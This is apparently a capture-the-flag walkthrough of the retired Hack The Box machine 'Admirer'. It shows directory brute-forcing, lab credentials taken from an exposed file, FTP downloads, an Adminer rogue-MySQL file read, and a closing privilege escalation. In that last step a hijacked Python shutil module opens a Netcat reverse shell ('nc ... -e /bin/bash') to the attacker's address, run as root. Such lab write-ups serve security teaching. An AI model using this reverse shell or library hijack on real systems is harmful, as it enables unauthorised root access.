Admirer

Name: Admirer
Release Date: 02 May 2020
Retire Date: 26 Sep 2020
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
whois 00 days, 03 hours, 57 mins, 47 seconds
joohoi 00 days, 04 hours, 33 mins, 13 seconds
Creator: polarbearer
GibParadox
Pentest Workstation PDF: Admirer.pdf

Again, we start with ../AutoRecon/src/autorecon/autorecon.py 10.10.10.187

We've got HTTP, so our next move is checking for other folders.  AutoRecon has already found an /admin-dir so let's start there with:

 

gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.187/admin-dir -x php,html,txt 

 
┌──(kali㉿kali)-[~/Admirer]
└─$ gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.187/admin-dir -x php,html,txt   
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.187/admin-dir
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,txt
[+] Timeout:        10s
===============================================================
2021/03/07 23:31:20 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.txt (Status: 403)
/contacts.txt (Status: 200)
/credentials.txt (Status: 200)
===============================================================
2021/03/07 23:42:54 Finished
===============================================================
 

A contacts.txt and credentials.txt file inside of the admin-dir folder both look promising.  We can grab those with simple WGET statements.

 

wget http://10.10.10.187/admin-dir/contacts.txt

wget http://10.10.10.187/admin-dir/credentials.txt

 

Then, we can cat those out and get some juicy credentials (FTP, An Internal Mail System, and Wordpress).

 
┌──(kali㉿kali)-[~/Admirer/results/10.10.10.187/loot]
└─$ cat contacts.txt                               
##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb


##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb



#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb
                                                                                                                          
┌──(kali㉿kali)-[~/Admirer/results/10.10.10.187/loot]
└─$ cat credentials.txt
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!
 

Now that we have some creds, let's jump to the FTP side of the world. 

 
┌──(kali㉿kali)-[~/Admirer/results/10.10.10.187/loot]
└─$ ftp 10.10.10.187
Connected to 10.10.10.187.
220 (vsFTPd 3.0.3)
Name (10.10.10.187:kali): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            3405 Dec 02  2019 dump.sql
-rw-r--r--    1 0        0         5270987 Dec 03  2019 html.tar.gz
226 Directory send OK.
ftp> get dump.sql
local: dump.sql remote: dump.sql
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for dump.sql (3405 bytes).
226 Transfer complete.
3405 bytes received in 0.00 secs (1.7980 MB/s)
ftp> get html.tar.gz
local: html.tar.gz remote: html.tar.gz
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for html.tar.gz (5270987 bytes).
226 Transfer complete.
5270987 bytes received in 7.35 secs (700.0977 kB/s)
ftp>
 

If you notice, there were dump.sql and html.tar.gz files and I went ahead and used FTP GET statements to GET the files.  Go ahead and extract the html.tar.gz.  Since we're looking for passwords, let's use "grep -ir password" and we get some credentials inside the index.php file.

So, if we cat index.php and ./utility-scripts/db-admin.php, we can see who those credentials belong to.

The credentials belong to "waldo".  Also, if we look at admin_tasks, we see a PCI-DSS violation of a webserver revealing internal directory structure or a possible vulnerability built into the admin_tasks.php page where it calls /opt/scripts/admin_tasks.sh.

Since we didn't notice the utility scripts folder in our gobuster scan, let's run gobuster against it and see what we can find using "gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.187/utility-scripts -x php,html,txt" wheere we find the adminer.php page.

 
┌──(kali㉿kali)-[~/…/10.10.10.187/loot/html/utility-scripts]
└─$ gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.187/utility-scripts -x php,html,txt  
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.187/utility-scripts
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,txt
[+] Timeout:        10s
===============================================================
2021/03/08 08:02:09 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.txt (Status: 403)
/adminer.php (Status: 200)
/info.php (Status: 200)
/phptest.php (Status: 200)
===============================================================
2021/03/08 08:09:58 Finished
===============================================================
 

Adminer is a MySQL management tool and we know there's a MySQL instance running on 3306.  Trying to log in with either of the two waldo credentials we've already found, fails miserably.  A little bit of research later and I find this https://infosecwriteups.com/adminer-script-results-to-pwning-server-private-bug-bounty-program-fe6d8a43fe6f. It looks like we're doig this the long way.  

 

First, let's install MariaDB (if we haven't already), and set up a new local database on our Attacking machine.  We do thise with:

 

sudo apt-get install ariadb-server-10.5 mariadb-client-10.5 -y

 

Now, we have to start the service and configure a database.  We do that with:

 

sudo systemctl start mariadb

sudo mysql -u root

MariaDB [(none)]> CREATE DATABASE backup;

USE backup;

CREATE TABLE backup (name VARCHAR(2000));

CREATE USER 'backup'@'10.10.10.187' IDENTIFIED BY'toor';

GRANT ALL PRIVILEGES ON backup.* TO 'backup'@'10.10.10.187';

Next, we make sure that traffic is allowed between Admirer and our Attacking machine and that the connection is bound to our tun0 adapter.  We do that with:

 

vi /etc/mysql/mariadb.conf.d/50-server.cnf

 

Inside the 50-server.cnf file, change the bind address to your tun0 address (in my case 10.10.14.4) or allow all addresses by setting it to 0.0.0.0.  We should be able to log in as our backup user and query a local file.

It looks like Waldo updated his password to "&<h5b~yK3F#{PaPB&dA}{H>".  So, let's try ssh with those and we are successful!

Now, we can run LinEnum.sh on the Target.  One thing we find in that script is that the script creating that lovely html.tar.gz backup file we;ve been digging around in for the past few hours is owned by root.  Possibly, we can use that to grant a Netcat callback as root.  Looking back at the admin_tasks.sh script, we see it calling backup.py and that backup.py calls shutil.py.  We can craft our own shutil.py, change the python path, and call the positional variable of the admin_tasks script.  First, the Netcat callback.

 

shutil.py:

import os

def make_archive(h, t, b):
    os.system('nc 10.10.14.4 9999 -e "/bin/bash"')

 

Next we have to change the python path and call the 6th task of admin_tasks.  I created this shutil.py in /dev/shm, so the python path needs to point there, and we need to call all of it with sudo.  Start a Netcat listener on 9999 and run:

 

sudo PYTHONPATH=/dev/shm /opt/scripts/admin_tasks.sh 6

 

Voila!  Root Shell.